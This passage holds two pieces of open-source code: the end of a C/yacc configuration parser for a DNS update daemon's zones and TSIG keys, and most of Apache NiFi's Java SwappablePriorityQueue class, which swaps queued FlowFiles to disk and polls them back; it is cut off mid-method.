LogMsg("ERROR: memory allocation failure");
YYABORT;
}
strncpy( zoneSpec->name, $2, sizeof( zoneSpec->name ) );
zoneSpec->type = g_zoneSpec.type;
strcpy( zoneSpec->key, g_zoneSpec.key );
zoneSpec->allowUpdate = g_zoneSpec.allowUpdate;
zoneSpec->allowQuery = g_zoneSpec.allowQuery;
zoneSpec->next = g_zones;
g_zones = zoneSpec;
}
|
ZONE QUOTEDSTRING IN zonecontent
{
ZoneSpec * zoneSpec;
zoneSpec = ( ZoneSpec* ) malloc( sizeof( ZoneSpec ) );
if ( !zoneSpec )
{
LogMsg("ERROR: memory allocation failure");
YYABORT;
}
strncpy( zoneSpec->name, $2, sizeof( zoneSpec->name ) );
zoneSpec->type = g_zoneSpec.type;
strcpy( zoneSpec->key, g_zoneSpec.key );
zoneSpec->allowUpdate = g_zoneSpec.allowUpdate;
zoneSpec->allowQuery = g_zoneSpec.allowQuery;
zoneSpec->next = g_zones;
g_zones = zoneSpec;
}
;
zonecontent:
OBRACE zonestatements EBRACE
zonestatements:
|
zonestatements zonestatement SEMICOLON
;
zonestatement:
TYPE PUBLIC
{
g_zoneSpec.type = kDNSZonePublic;
}
|
TYPE PRIVATE
{
g_zoneSpec.type = kDNSZonePrivate;
}
|
ALLOWUPDATE keycontent
{
g_zoneSpec.allowUpdate = g_stringList;
g_stringList = NULL;
}
|
ALLOWQUERY keycontent
{
g_zoneSpec.allowQuery = g_stringList;
g_stringList = NULL;
}
;
addresscontent:
OBRACE addressstatements EBRACE
{
}
addressstatements:
|
addressstatements addressstatement SEMICOLON
{
}
;
addressstatement:
DOTTED_DECIMAL_ADDRESS
{
StringListElem * elem;
elem = ( StringListElem* ) malloc( sizeof( StringListElem ) );
if ( !elem )
{
LogMsg("ERROR: memory allocation failure");
YYABORT;
}
elem->string = $1;
elem->next = g_addrList;
g_addrList = elem;
}
;
keycontent:
OBRACE keystatements EBRACE
{
}
keystatements:
|
keystatements keystatement SEMICOLON
{
}
;
keystatement:
KEY DOMAINNAME
{
StringListElem * elem;
elem = ( StringListElem* ) malloc( sizeof( StringListElem ) );
if ( !elem )
{
LogMsg("ERROR: memory allocation failure");
YYABORT;
}
elem->string = $2;
elem->next = g_stringList;
g_stringList = elem;
}
;
networkaddress:
DOTTED_DECIMAL_ADDRESS
|
HOSTNAME
|
WILDCARD
;
block:
OBRACE zonestatements EBRACE SEMICOLON
;
statements:
|
statements statement
;
statement:
block
{
$<string>$ = NULL;
}
|
QUOTEDSTRING
{
$<string>$ = $1;
}
%%
int yywrap(void);
extern int yylineno;
void yyerror( const char *str )
{
fprintf( stderr,"%s:%d: error: %s\n", g_filename, yylineno, str );
}
int yywrap()
{
return 1;
}
int
ParseConfig
(
DaemonInfo * d,
const char * file
)
{
extern FILE * yyin;
DNSZone * zone;
DomainAuthInfo * key;
KeySpec * keySpec;
ZoneSpec * zoneSpec;
int err = 0;
g_filename = file;
// Tear down the current zone specifiers
zone = d->zones;
while ( zone )
{
DNSZone * next = zone->next;
key = zone->updateKeys;
while ( key )
{
DomainAuthInfo * nextKey = key->next;
free( key );
key = nextKey;
}
key = zone->queryKeys;
while ( key )
{
DomainAuthInfo * nextKey = key->next;
free( key );
key = nextKey;
}
free( zone );
zone = next;
}
d->zones = NULL;
yyin = fopen( file, "r" );
require_action( yyin, exit, err = 0 );
err = yyparse( ( void* ) d );
require_action( !err, exit, err = 1 );
for ( zoneSpec = g_zones; zoneSpec; zoneSpec = zoneSpec->next )
{
StringListElem * elem;
mDNSu8 * ok;
zone = ( DNSZone* ) malloc( sizeof( DNSZone ) );
require_action( zone, exit, err = 1 );
memset( zone, 0, sizeof( DNSZone ) );
zone->next = d->zones;
d->zones = zone;
// Fill in the domainname
ok = MakeDomainNameFromDNSNameString( &zone->name, zoneSpec->name );
require_action( ok, exit, err = 1 );
// Fill in the type
zone->type = zoneSpec->type;
// Fill in the allow-update keys
for ( elem = zoneSpec->allowUpdate; elem; elem = elem->next )
{
mDNSBool found = mDNSfalse;
for ( keySpec = g_keys; keySpec; keySpec = keySpec->next )
{
if ( strcmp( elem->string, keySpec->name ) == 0 )
{
DomainAuthInfo * authInfo = malloc( sizeof( DomainAuthInfo ) );
mDNSs32 keylen;
require_action( authInfo, exit, err = 1 );
memset( authInfo, 0, sizeof( DomainAuthInfo ) );
ok = MakeDomainNameFromDNSNameString( &authInfo->keyname, keySpec->name );
if (!ok) { free(authInfo); err = 1; goto exit; }
keylen = DNSDigest_ConstructHMACKeyfromBase64( authInfo, keySpec->secret );
if (keylen < 0) { free(authInfo); err = 1; goto exit; }
authInfo->next = zone->updateKeys;
zone->updateKeys = authInfo;
found = mDNStrue;
break;
}
}
// Log this
require_action( found, exit, err = 1 );
}
// Fill in the allow-query keys
for ( elem = zoneSpec->allowQuery; elem; elem = elem->next )
{
mDNSBool found = mDNSfalse;
for ( keySpec = g_keys; keySpec; keySpec = keySpec->next )
{
if ( strcmp( elem->string, keySpec->name ) == 0 )
{
DomainAuthInfo * authInfo = malloc( sizeof( DomainAuthInfo ) );
mDNSs32 keylen;
require_action( authInfo, exit, err = 1 );
memset( authInfo, 0, sizeof( DomainAuthInfo ) );
ok = MakeDomainNameFromDNSNameString( &authInfo->keyname, keySpec->name );
if (!ok) { free(authInfo); err = 1; goto exit; }
keylen = DNSDigest_ConstructHMACKeyfromBase64( authInfo, keySpec->secret );
if (keylen < 0) { free(authInfo); err = 1; goto exit; }
authInfo->next = zone->queryKeys;
zone->queryKeys = authInfo;
found = mDNStrue;
break;
}
}
// Log this
require_action( found, exit, err = 1 );
}
}
exit:
return err;
}
void
SetupOptions
(
OptionsInfo * info,
void * context
)
{
DaemonInfo * d = ( DaemonInfo* ) context;
if ( strlen( info->source_address ) )
{
inet_pton( AF_INET, info->source_address, &d->addr.sin_addr );
}
if ( info->source_port )
{
d->addr.sin_port = htons( ( mDNSu16 ) info->source_port );
}
if ( strlen( info->server_address ) )
{
inet_pton( AF_INET, info->server_address, &d->ns_addr.sin_addr );
}
if ( info->server_port )
{
d->ns_addr.sin_port = htons( ( mDNSu16 ) info->server_port );
}
if ( info->private_port )
{
d->private_port = mDNSOpaque16fromIntVal( info->private_port );
}
if ( info->llq_port )
{
d->llq_port = mDNSOpaque16fromIntVal( info->llq_port );
}
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.nifi.controller.queue;
import org.apache.nifi.controller.repository.FlowFileRecord;
import org.apache.nifi.controller.repository.FlowFileSwapManager;
import org.apache.nifi.controller.repository.IncompleteSwapFileException;
import org.apache.nifi.controller.repository.SwapContents;
import org.apache.nifi.controller.repository.SwapSummary;
import org.apache.nifi.controller.repository.claim.ResourceClaim;
import org.apache.nifi.controller.swap.StandardSwapSummary;
import org.apache.nifi.events.EventReporter;
import org.apache.nifi.flowfile.FlowFile;
import org.apache.nifi.flowfile.FlowFilePrioritizer;
import org.apache.nifi.flowfile.attributes.CoreAttributes;
import org.apache.nifi.processor.FlowFileFilter;
import org.apache.nifi.processor.FlowFileFilter.FlowFileFilterResult;
import org.apache.nifi.reporting.Severity;
import org.apache.nifi.util.concurrency.TimedLock;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.Iterator;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.PriorityQueue;
import java.util.Queue;
import java.util.Set;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicReference;
import java.util.concurrent.locks.ReentrantReadWriteLock;
public class SwappablePriorityQueue {
private static final Logger logger = LoggerFactory.getLogger(SwappablePriorityQueue.class);
private static final int SWAP_RECORD_POLL_SIZE = 10_000;
private static final int MAX_EXPIRED_RECORDS_PER_ITERATION = 10_000;
private final int swapThreshold;
private final FlowFileSwapManager swapManager;
private final EventReporter eventReporter;
private final FlowFileQueue flowFileQueue;
private final DropFlowFileAction dropAction;
private final List<FlowFilePrioritizer> priorities = new ArrayList<>();
private final String swapPartitionName;
private final List<String> swapLocations = new ArrayList<>();
private final AtomicReference<FlowFileQueueSize> size = new AtomicReference<>(new FlowFileQueueSize(0, 0L, 0, 0L, 0, 0, 0L));
private final TimedLock readLock;
private final TimedLock writeLock;
// We keep an "active queue" and a "swap queue" that both are able to hold records in heap. When
// FlowFiles are added to this FlowFileQueue, we first check if we are in "swap mode" and if so
// we add to the 'swap queue' instead of the 'active queue'. The code would be much simpler if we
// eliminated the 'swap queue' and instead just used the active queue and swapped out the 10,000
// lowest priority FlowFiles from that. However, doing that would cause problems with the ordering
// of FlowFiles. If we swap out some FlowFiles, and then allow a new FlowFile to be written to the
// active queue, then we would end up processing the newer FlowFile before the swapped FlowFile. By
// keeping these separate, we are able to guarantee that FlowFiles are swapped in in the same order
// that they are swapped out.
// Guarded by lock.
private PriorityQueue<FlowFileRecord> activeQueue;
private ArrayList<FlowFileRecord> swapQueue;
private boolean swapMode = false;
public SwappablePriorityQueue(final FlowFileSwapManager swapManager, final int swapThreshold, final EventReporter eventReporter, final FlowFileQueue flowFileQueue,
final DropFlowFileAction dropAction, final String swapPartitionName) {
this.swapManager = swapManager;
this.swapThreshold = swapThreshold;
this.activeQueue = new PriorityQueue<>(20, new QueuePrioritizer(Collections.emptyList()));
this.swapQueue = new ArrayList<>();
this.eventReporter = eventReporter;
this.flowFileQueue = flowFileQueue;
this.dropAction = dropAction;
this.swapPartitionName = swapPartitionName;
final ReentrantReadWriteLock lock = new ReentrantReadWriteLock(true);
readLock = new TimedLock(lock.readLock(), flowFileQueue.getIdentifier() + " Read Lock", 100);
writeLock = new TimedLock(lock.writeLock(), flowFileQueue.getIdentifier() + " Write Lock", 100);
}
private String getQueueIdentifier() {
return flowFileQueue.getIdentifier();
}
public List<FlowFilePrioritizer> getPriorities() {
readLock.lock();
try {
return Collections.unmodifiableList(priorities);
} finally {
readLock.unlock("getPriorities");
}
}
public void setPriorities(final List<FlowFilePrioritizer> newPriorities) {
writeLock.lock();
try {
priorities.clear();
priorities.addAll(newPriorities);
final PriorityQueue<FlowFileRecord> newQueue = new PriorityQueue<>(Math.max(20, activeQueue.size()), new QueuePrioritizer(newPriorities));
newQueue.addAll(activeQueue);
activeQueue = newQueue;
} finally {
writeLock.unlock("setPriorities");
}
}
public LocalQueuePartitionDiagnostics getQueueDiagnostics() {
readLock.lock();
try {
final boolean anyPenalized = !activeQueue.isEmpty() && activeQueue.peek().isPenalized();
final boolean allPenalized = anyPenalized && activeQueue.stream().anyMatch(FlowFileRecord::isPenalized);
return new StandardLocalQueuePartitionDiagnostics(getFlowFileQueueSize(), anyPenalized, allPenalized);
} finally {
readLock.unlock("getQueueDiagnostics");
}
}
public List<FlowFileRecord> getActiveFlowFiles() {
readLock.lock();
try {
return new ArrayList<>(activeQueue);
} finally {
readLock.unlock("getActiveFlowFiles");
}
}
public boolean isUnacknowledgedFlowFile() {
return getFlowFileQueueSize().getUnacknowledgedCount() > 0;
}
/**
* This method MUST be called with the write lock held
*/
private void writeSwapFilesIfNecessary() {
if (swapQueue.size() < SWAP_RECORD_POLL_SIZE) {
return;
}
migrateSwapToActive();
if (swapQueue.size() < SWAP_RECORD_POLL_SIZE) {
return;
}
final int numSwapFiles = swapQueue.size() / SWAP_RECORD_POLL_SIZE;
int originalSwapQueueCount = swapQueue.size();
long originalSwapQueueBytes = 0L;
for (final FlowFileRecord flowFile : swapQueue) {
originalSwapQueueBytes += flowFile.getSize();
}
// Create a new Priority queue with the same prioritizers that are set for this queue. We want to swap out the highest priority data first, because
// whatever data we don't write out to a swap file (because there isn't enough to fill a swap file) will be added back to the swap queue.
// Since the swap queue cannot be processed until all swap files, we want to ensure that only the lowest priority data goes back onto it. Which means
// that we must swap out the highest priority data that is currently on the swap queue.
final PriorityQueue<FlowFileRecord> tempQueue = new PriorityQueue<>(swapQueue.size(), new QueuePrioritizer(getPriorities()));
tempQueue.addAll(swapQueue);
long bytesSwappedOut = 0L;
int flowFilesSwappedOut = 0;
final List<String> swapLocations = new ArrayList<>(numSwapFiles);
for (int i = 0; i < numSwapFiles; i++) {
long bytesSwappedThisIteration = 0L;
// Create a new swap file for the next SWAP_RECORD_POLL_SIZE records
final List<FlowFileRecord> toSwap = new ArrayList<>(SWAP_RECORD_POLL_SIZE);
for (int j = 0; j < SWAP_RECORD_POLL_SIZE; j++) {
final FlowFileRecord flowFile = tempQueue.poll();
toSwap.add(flowFile);
bytesSwappedThisIteration += flowFile.getSize();
}
try {
Collections.reverse(toSwap); // currently ordered in reverse priority order based on the ordering of the temp queue.
final String swapLocation = swapManager.swapOut(toSwap, flowFileQueue, swapPartitionName);
swapLocations.add(swapLocation);
logger.debug("Successfully wrote out Swap File {} containing {} FlowFiles ({} bytes)", swapLocation, toSwap.size(), bytesSwappedThisIteration);
bytesSwappedOut += bytesSwappedThisIteration;
flowFilesSwappedOut += toSwap.size();
} catch (final IOException ioe) {
tempQueue.addAll(toSwap); // if we failed, we must add the FlowFiles back to the queue.
final int objectCount = getFlowFileCount();
logger.error("FlowFile Queue with identifier {} has {} FlowFiles queued up. Attempted to spill FlowFile information over to disk in order to avoid exhausting "
+ "the Java heap space but failed to write information to disk due to {}", getQueueIdentifier(), objectCount, ioe.toString());
logger.error("", ioe);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.ERROR, "Failed to Overflow to Disk", "Flowfile Queue with identifier " + getQueueIdentifier() + " has " + objectCount +
" queued up. Attempted to spill FlowFile information over to disk in order to avoid exhausting the Java heap space but failed to write information to disk. "
+ "See logs for more information.");
}
break;
}
}
// Pull any records off of the temp queue that won't fit back on the active queue, and add those to the
// swap queue. Then add the records back to the active queue.
swapQueue.clear();
long updatedSwapQueueBytes = 0L;
FlowFileRecord record;
while ((record = tempQueue.poll()) != null) {
swapQueue.add(record);
updatedSwapQueueBytes += record.getSize();
}
Collections.reverse(swapQueue); // currently ordered in reverse priority order based on the ordering of the temp queue
boolean updated = false;
while (!updated) {
final FlowFileQueueSize originalSize = getFlowFileQueueSize();
final int addedSwapRecords = swapQueue.size() - originalSwapQueueCount;
final long addedSwapBytes = updatedSwapQueueBytes - originalSwapQueueBytes;
final FlowFileQueueSize newSize = new FlowFileQueueSize(originalSize.getActiveCount(), originalSize.getActiveBytes(),
originalSize.getSwappedCount() + addedSwapRecords + flowFilesSwappedOut,
originalSize.getSwappedBytes() + addedSwapBytes + bytesSwappedOut,
originalSize.getSwapFileCount() + numSwapFiles,
originalSize.getUnacknowledgedCount(), originalSize.getUnacknowledgedBytes());
updated = updateSize(originalSize, newSize);
if (updated) {
logIfNegative(originalSize, newSize, "swap");
}
}
this.swapLocations.addAll(swapLocations);
logger.debug("After writing swap files, setting new set of Swap Locations to {}", this.swapLocations);
}
private int getFlowFileCount() {
final FlowFileQueueSize size = getFlowFileQueueSize();
return size.getActiveCount() + size.getSwappedCount() + size.getUnacknowledgedCount();
}
/**
* If there are FlowFiles waiting on the swap queue, move them to the active
* queue until we meet our threshold. This prevents us from having to swap
* them to disk & then back out.
*
* This method MUST be called with the writeLock held.
*/
private void migrateSwapToActive() {
// Migrate as many FlowFiles as we can from the Swap Queue to the Active Queue, so that we don't
// have to swap them out & then swap them back in.
// If we don't do this, we could get into a situation where we have potentially thousands of FlowFiles
// sitting on the Swap Queue but not getting processed because there aren't enough to be swapped out.
// In particular, this can happen if the queue is typically filled with surges.
// For example, if the queue has 25,000 FlowFiles come in, it may process 20,000 of them and leave
// 5,000 sitting on the Swap Queue. If it then takes an hour for an additional 5,000 FlowFiles to come in,
// those FlowFiles sitting on the Swap Queue will sit there for an hour, waiting to be swapped out and
// swapped back in again.
// Calling this method when records are polled prevents this condition by migrating FlowFiles from the
// Swap Queue to the Active Queue. However, we don't do this if there are FlowFiles already swapped out
// to disk, because we want them to be swapped back in in the same order that they were swapped out.
if (!activeQueue.isEmpty()) {
return;
}
// If there are swap files waiting to be swapped in, swap those in first. We do this in order to ensure that those that
// were swapped out first are then swapped back in first. If we instead just immediately migrated the FlowFiles from the
// swap queue to the active queue, and we never run out of FlowFiles in the active queue (because destination cannot
// keep up with queue), we will end up always processing the new FlowFiles first instead of the FlowFiles that arrived
// first.
if (!swapLocations.isEmpty()) {
swapIn();
return;
}
// this is the most common condition (nothing is swapped out), so do the check first and avoid the expense
// of other checks for 99.999% of the cases.
final FlowFileQueueSize size = getFlowFileQueueSize();
if (size.getSwappedCount() == 0 && swapQueue.isEmpty()) {
return;
}
if (size.getSwappedCount() > swapQueue.size()) {
// we already have FlowFiles swapped out, so we won't migrate the queue; we will wait for
// the files to be swapped back in first
return;
}
// Swap Queue is not currently ordered. We want to migrate the highest priority FlowFiles to the Active Queue, then re-queue the lowest priority items.
final PriorityQueue<FlowFileRecord> tempQueue = new PriorityQueue<>(swapQueue.size(), new QueuePrioritizer(getPriorities()));
tempQueue.addAll(swapQueue);
int recordsMigrated = 0;
long bytesMigrated = 0L;
while (activeQueue.size() < swapThreshold) {
final FlowFileRecord toMigrate = tempQueue.poll();
if (toMigrate == null) {
break;
}
activeQueue.add(toMigrate);
bytesMigrated += toMigrate.getSize();
recordsMigrated++;
}
swapQueue.clear();
FlowFileRecord toRequeue;
while ((toRequeue = tempQueue.poll()) != null) {
swapQueue.add(toRequeue);
}
if (recordsMigrated > 0) {
incrementActiveQueueSize(recordsMigrated, bytesMigrated);
incrementSwapQueueSize(-recordsMigrated, -bytesMigrated, 0);
logger.debug("Migrated {} FlowFiles from swap queue to active queue for {}", recordsMigrated, this);
}
if (size.getSwappedCount() == 0) {
swapMode = false;
}
}
private void swapIn() {
final String swapLocation = swapLocations.get(0);
boolean partialContents = false;
SwapContents swapContents;
try {
logger.debug("Attempting to swap in {}; all swap locations = {}", swapLocation, swapLocations);
swapContents = swapManager.swapIn(swapLocation, flowFileQueue);
swapLocations.remove(0);
} catch (final IncompleteSwapFileException isfe) {
logger.error("Failed to swap in all FlowFiles from Swap File {}; Swap File ended prematurely. The records that were present will still be swapped in", swapLocation);
logger.error("", isfe);
swapContents = isfe.getPartialContents();
partialContents = true;
swapLocations.remove(0);
} catch (final FileNotFoundException fnfe) {
logger.error("Failed to swap in FlowFiles from Swap File {} because the Swap File can no longer be found", swapLocation);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.ERROR, "Swap File", "Failed to swap in FlowFiles from Swap File " + swapLocation + " because the Swap File can no longer be found");
}
swapLocations.remove(0);
return;
} catch (final IOException ioe) {
logger.error("Failed to swap in FlowFiles from Swap File {}; Swap File appears to be corrupt!", swapLocation);
logger.error("", ioe);
if (eventReporter != null) {
eventReporter.reportEvent(Severity.ERROR, "Swap File", "Failed to swap in FlowFiles from Swap File " +
swapLocation + "; Swap File appears to be corrupt! Some FlowFiles in the queue may not be accessible. See logs for more information.");
}
// We do not remove the Swap File from swapLocations because the IOException may be recoverable later. For instance, the file may be on a network
// drive and we may have connectivity problems, etc.
return;
} catch (final Throwable t) {
logger.error("Failed to swap in FlowFiles from Swap File {}", swapLocation, t);
// We do not remove the Swap File from swapLocations because this is an unexpected failure that may be retry-able. For example, if there were
// an OOME, etc. then we don't want to he queue to still reflect that the data is around but never swap it in. By leaving the Swap File
// in swapLocations, we will continue to retry.
throw t;
}
final QueueSize swapSize = swapContents.getSummary().getQueueSize();
final long contentSize = swapSize.getByteCount();
final int flowFileCount = swapSize.getObjectCount();
incrementSwapQueueSize(-flowFileCount, -contentSize, -1);
if (partialContents) {
// if we have partial results, we need to calculate the content size of the flowfiles
// actually swapped back in.
long contentSizeSwappedIn = 0L;
for (final FlowFileRecord swappedIn : swapContents.getFlowFiles()) {
contentSizeSwappedIn += swappedIn.getSize();
}
incrementActiveQueueSize(swapContents.getFlowFiles().size(), contentSizeSwappedIn);
logger.debug("Swapped in partial contents containing {} FlowFiles ({} bytes) from {}", swapContents.getFlowFiles().size(), contentSizeSwappedIn, swapLocation);
} else {
// we swapped in the whole swap file. We can just use the info that we got from the summary.
incrementActiveQueueSize(flowFileCount, contentSize);
logger.debug("Successfully swapped in Swap File {} containing {} FlowFiles ({} bytes)", swapLocation, flowFileCount, contentSize);
}
activeQueue.addAll(swapContents.getFlowFiles());
}
public QueueSize size() {
return getFlowFileQueueSize().toQueueSize();
}
public boolean isEmpty() {
return getFlowFileQueueSize().isEmpty();
}
public boolean isFlowFileAvailable() {
if (isEmpty()) {
return false;
}
readLock.lock();
try {
// If we have data in the active or swap queue that is penalized, then we know that all FlowFiles
// are penalized. As a result, we can say that no FlowFile is available.
FlowFileRecord firstRecord = activeQueue.peek();
if (firstRecord == null && !swapQueue.isEmpty()) {
firstRecord = swapQueue.get(0);
}
if (firstRecord == null) {
// If the queue is not empty, then all data is swapped out. We don't actually know whether or not the swapped out data is penalized, so we assume
// that it is not penalized and is therefore available.
return !isEmpty();
}
// We do have a FlowFile that was retrieved from the active or swap queue. It is available if it is not penalized.
return !firstRecord.isPenalized();
} finally {
readLock.unlock("isFlowFileAvailable");
}
}
public boolean isActiveQueueEmpty() {
final FlowFileQueueSize queueSize = getFlowFileQueueSize();
return queueSize.getActiveCount() == 0 && queueSize.getSwappedCount() == 0;
}
public void acknowledge(final FlowFileRecord flowFile) {
logger.trace("{} Acknowledging {}", this, flowFile);
incrementUnacknowledgedQueueSize(-1, -flowFile.getSize());
}
public void acknowledge(final Collection<FlowFileRecord> flowFiles) {
logger.trace("{} Acknowledging {}", this, flowFiles);
final long totalSize = flowFiles.stream().mapToLong(FlowFileRecord::getSize).sum();
incrementUnacknowledgedQueueSize(-flowFiles.size(), -totalSize);
}
public void put(final FlowFileRecord flowFile) {
writeLock.lock();
try {
if (swapMode || activeQueue.size() >= swapThreshold) {
swapQueue.add(flowFile);
incrementSwapQueueSize(1, flowFile.getSize(), 0);
swapMode = true;
writeSwapFilesIfNecessary();
} else {
incrementActiveQueueSize(1, flowFile.getSize());
activeQueue.add(flowFile);
}
logger.trace("{} put to {}", flowFile, this);
} finally {
writeLock.unlock("put(FlowFileRecord)");
}
}
public void putAll(final Collection<FlowFileRecord> flowFiles) {
final int numFiles = flowFiles.size();
long bytes = 0L;
for (final FlowFile flowFile : flowFiles) {
bytes += flowFile.getSize();
}
writeLock.lock();
try {
if (swapMode || activeQueue.size() >= swapThreshold - numFiles) {
swapQueue.addAll(flowFiles);
incrementSwapQueueSize(numFiles, bytes, 0);
swapMode = true;
writeSwapFilesIfNecessary();
} else {
incrementActiveQueueSize(numFiles, bytes);
activeQueue.addAll(flowFiles);
}
logger.trace("{} put to {}", flowFiles, this);
} finally {
writeLock.unlock("putAll");
}
}
public FlowFileRecord poll(final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
FlowFileRecord flowFile;
// First check if we have any records Pre-Fetched.
writeLock.lock();
try {
flowFile = doPoll(expiredRecords, expirationMillis);
if (flowFile != null) {
logger.trace("{} poll() returning {}", this, flowFile);
incrementUnacknowledgedQueueSize(1, flowFile.getSize());
}
return flowFile;
} finally {
writeLock.unlock("poll(Set)");
}
}
private FlowFileRecord doPoll(final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
FlowFileRecord flowFile;
boolean isExpired;
migrateSwapToActive();
long expiredBytes = 0L;
do {
flowFile = this.activeQueue.poll();
isExpired = isExpired(flowFile, expirationMillis);
if (isExpired) {
expiredRecords.add(flowFile);
expiredBytes += flowFile.getSize();
flowFile = null;
if (expiredRecords.size() >= MAX_EXPIRED_RECORDS_PER_ITERATION) {
break;
}
} else if (flowFile != null && flowFile.isPenalized()) {
this.activeQueue.add(flowFile);
flowFile = null;
break;
}
if (flowFile != null) {
incrementActiveQueueSize(-1, -flowFile.getSize());
}
} while (isExpired);
if (!expiredRecords.isEmpty()) {
incrementActiveQueueSize(-expiredRecords.size(), -expiredBytes);
}
return flowFile;
}
public List<FlowFileRecord> poll(int maxResults, final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
final List<FlowFileRecord> records = new ArrayList<>(Math.min(1, maxResults));
// First check if we have any records Pre-Fetched.
writeLock.lock();
try {
doPoll(records, maxResults, expiredRecords, expirationMillis);
} finally {
writeLock.unlock("poll(int, Set)");
}
if (!records.isEmpty()) {
logger.trace("{} poll() returning {}", this, records);
}
return records;
}
public List<FlowFileRecord> poll(final FlowFileFilter filter, final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
long bytesPulled = 0L;
int flowFilesPulled = 0;
writeLock.lock();
try {
migrateSwapToActive();
final List<FlowFileRecord> selectedFlowFiles = new ArrayList<>();
final List<FlowFileRecord> unselected = new ArrayList<>();
while (true) {
FlowFileRecord flowFile = this.activeQueue.poll();
if (flowFile == null) {
break;
}
final boolean isExpired = isExpired(flowFile, expirationMillis);
if (isExpired) {
expiredRecords.add(flowFile);
bytesPulled += flowFile.getSize();
flowFilesPulled++;
if (expiredRecords.size() >= MAX_EXPIRED_RECORDS_PER_ITERATION) {
break;
} else {
continue;
}
} else if (flowFile.isPenalized()) {
this.activeQueue.add(flowFile);
break; // just stop searching because the rest are all penalized.
}
final FlowFileFilterResult result = filter.filter(flowFile);
if (result.isAccept()) {
bytesPulled += flowFile.getSize();
flowFilesPulled++;
incrementUnacknowledgedQueueSize(1, flowFile.getSize());
selectedFlowFiles.add(flowFile);
} else {
unselected.add(flowFile);
}
if (!result.isContinue()) {
break;
}
}
this.activeQueue.addAll(unselected);
incrementActiveQueueSize(-flowFilesPulled, -bytesPulled);
if (!selectedFlowFiles.isEmpty()) {
logger.trace("{} poll() returning {}", this, selectedFlowFiles);
}
return selectedFlowFiles;
} finally {
writeLock.unlock("poll(Filter, Set)");
}
}
private void doPoll(final List<FlowFileRecord> records, int maxResults, final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
migrateSwapToActive();
final long bytesDrained = drainQueue(activeQueue, records, maxResults, expiredRecords, expirationMillis);
long expiredBytes = 0L;
for (final FlowFileRecord record : expiredRecords) {
expiredBytes += record.getSize();
}
incrementActiveQueueSize(-(expiredRecords.size() + records.size()), -bytesDrained);
incrementUnacknowledgedQueueSize(records.size(), bytesDrained - expiredBytes);
}
protected boolean isExpired(final FlowFile flowFile, final long expirationMillis) {
return isLaterThan(getExpirationDate(flowFile, expirationMillis));
}
private boolean isLaterThan(final Long maxAge) {
if (maxAge == null) {
return false;
}
return maxAge < System.currentTimeMillis();
}
private Long getExpirationDate(final FlowFile flowFile, final long expirationMillis) {
if (flowFile == null) {
return null;
}
if (expirationMillis <= 0) {
return null;
} else {
final long entryDate = flowFile.getEntryDate();
final long expirationDate = entryDate + expirationMillis;
return expirationDate;
}
}
private long drainQueue(final Queue<FlowFileRecord> sourceQueue, final List<FlowFileRecord> destination, int maxResults, final Set<FlowFileRecord> expiredRecords, final long expirationMillis) {
long drainedSize = 0L;
FlowFileRecord pulled;
while (destination.size() < maxResults && (pulled = sourceQueue.poll()) != null) {
if (isExpired(pulled, expirationMillis)) {
expiredRecords.add(pulled);
if (expiredRecords.size() >= MAX_EXPIRED_RECORDS_PER_ITERATION) {
break;
}
} else {
if (pulled.isPenalized()) {
sourceQueue.add(pulled);
break;
}
destination.add(pulled);
}
drainedSize += pulled.getSize();
}
return drainedSize;
}
public FlowFileRecord getFlowFile(final String flowFileUuid) {
if (flowFileUuid == null) {
return null;
}
readLock.lock();
try {
// read through all of the FlowFiles in the queue, looking for the FlowFile with the given ID
for (final FlowFileRecord flowFile : activeQueue) {
if (flowFileUuid.equals(flowFile.getAttribute(CoreAttributes.UUID.key()))) {
return flowFile;
}
}
} finally {
readLock.unlock("getFlowFile");
}
return null;
}
public void dropFlowFiles(final DropFlowFileRequest dropRequest, final String requestor) {
final String requestIdentifier = dropRequest.getRequestIdentifier();
writeLock.lock();
try {
dropRequest.setState(DropFlowFileState.DROPPING_FLOWFILES);
logger.debug("For DropFlowFileRequest {}, original size is {}", requestIdentifier, size());
try {
final List<FlowFileRecord> activeQueueRecords = new ArrayList<>(activeQueue);
QueueSize droppedSize;
try {
if (dropRequest.getState() == DropFlowFileState.CANCELED) {
logger.info("Cancel requested for DropFlowFileRequest {}", requestIdentifier);
return;
}
droppedSize = dropAction.drop(activeQueueRecords, requestor);
logger.debug("For DropFlowFileRequest {}, Dropped {} from active queue", requestIdentifier, droppedSize);
} catch (final IOException ioe) {
logger.error("Failed to drop the FlowFiles from queue {} due to {}", getQueueIdentifier(), ioe.toString());
logger.error("", ioe);
dropRequest.setState(DropFlowFileState.FAILURE, "Failed to drop FlowFiles due to " + ioe.toString());
return;
}
activeQueue.clear();
incrementActiveQueueSize(-droppedSize.getObjectCount(), -droppedSize.getByteCount());
dropRequest.setCurrentSize(size());
dropRequest.setDroppedSize(dropRequest.getDroppedSize().add(droppedSize));
final QueueSize swapSize = getFlowFileQueueSize().swapQueueSize();
logger.debug("For DropFlowFileRequest {}, Swap Queue has {} elements, Swapped Record Count = {}, Swapped Content Size = {}",
requestIdentifier, swapQueue.size(), swapSize.getObjectCount(), swapSize.getByteCount());
if (dropRequest.getState() == DropFlowFileState.CANCELED) {
logger.info("Cancel requested for DropFlowFileRequest {}", requestIdentifier);
return;
}
try {
droppedSize = dropAction.drop(swapQueue, requestor);
} catch (final IOException ioe) {
